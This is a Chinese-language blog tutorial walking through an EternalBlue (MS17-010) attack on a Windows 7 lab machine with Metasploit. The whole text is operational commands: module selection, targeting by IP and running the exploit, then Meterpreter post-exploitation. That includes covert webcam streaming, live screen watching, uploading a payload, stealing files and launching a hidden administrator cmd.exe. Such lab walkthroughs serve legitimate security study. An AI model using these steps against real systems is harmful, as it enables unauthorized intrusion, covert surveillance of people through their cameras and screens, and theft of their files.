準備環境:
1.安裝Kali Linux的電腦或虛擬機(可以直接在官網上下載Vmx檔案或ova檔案)
2.安裝有Windows 7 的計算機
準備作業:
1.卸載掉Windows 7的用于永恒之藍的漏洞修補更新,
2.關閉Windows 7中的所有殺毒軟體(例如:360,火絨,卡巴斯基)
實驗開始:
1.Kali Linux 中搜索 metasploit framework 雙擊打開,
2.輸入密碼(如果是直接在官網上下載的Vmx或ova檔案的話,密碼默認為kali )
3.等待一會兒,等到加載完成后,輸入
use auxiliary/scanner/smb/smb_ms17_010
以使用ms17的漏洞模塊,
4.隨后輸入
use exploit/windows/smb/ms17_010_eternalblue
以使用 ms17_010_eternalblue 模塊,
5.回到Windows 7,在cmd中輸入ipconfig回車,找到目標機的IP地址(此處為 192.168.0.104 ),
6.在Kali Linux中輸入
set rhosts 192.168.0.104
注意:rhosts 后的是你的目標機的IP地址!
7.最后輸入
run
開始攻擊!
當出現 host is likely VULNERABLE 時說明目標機器有“永恒之藍”漏洞,
當看見win的時候,說明成功!
注意:如果你看到是下面這個圖片:
請檢查目標主機的防火墻是否關閉,安全軟體是否禁用,如果還是不行,請重啟目標主機,
入侵成功:
入侵成功后,你會發現目標主機什么動靜都沒有,
輸入 help 查看一些命令
你會發現有許多你可以做的,
例如:
1.查看系統資訊
sysinfo
2.監控攝像頭
如果目標主機有攝像頭,(或者你是筆記本電腦且使用了虛擬機,則你可以把攝像頭連接到虛擬機)
輸入命令查看攝像頭串列:
webcam_list
輸入命令連接攝像頭
webcam_stream 1
其中stream后的數字是你在list中要連接的攝像頭前的標號,
隨后會自動打開瀏覽器,查看攝像頭,保護隱私,所以用白框遮住了,
關閉瀏覽器,回到終端按ctrl — c 終止繼續監控攝像頭,
3.上傳、下載檔案
使用命令上傳檔案
upload 要上傳的檔案路徑 上傳到目標機器的路徑
例如
upload /home/kali/Desktop/payload.exe C:\\Users\\Public\\Desktop
注意,要上傳的目錄路徑必須用雙重反斜杠 \\ !
可以看到,目標機桌面出現了檔案,
使用命令下載檔案
download 目標機檔案位置路徑 Kali下載到的路徑
例如:
download C:\\123.txt /home/kali/Desktop
我們發現,Kali Linux桌面上出現了我們想要的檔案
4.遠程執行 cmd 命令
使用命令打開 cmd
execute -H -i -f cmd.exe
其中,execute表示運行, -H表示是建立隱藏行程(hide) ,
出現了熟悉的cmd界面,而且現在我們擁有管理員權限!
現在可以運行任意命令了,例如cd , tasklist , dir , del 等,
要退出cmd的話只要輸入exit即可,如果它問你 Terminate channel xxx ? [y/N] ,輸入y后按回車,
5.實時觀察目標機在干什么
輸入命令
screenshare
成功!
回傳終端,按ctrl — c 終止,
6.還有很多命令
還有很多命令,輸入 help 查看,后面都有詳細的命令解釋,
7.退出meterprefer
輸入命令
exit
如果要再次控制,輸入run即可,
至此,對 Windows 7 攻擊成功!
注意:不推薦你一直 exit 再 run 再 exit 再 run ,否則會使得目標機藍屏,
再次注意
關閉360,火絨等殺毒軟體,不然的話:
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/293099.html
標籤:其他
下一篇:python 協程安全理解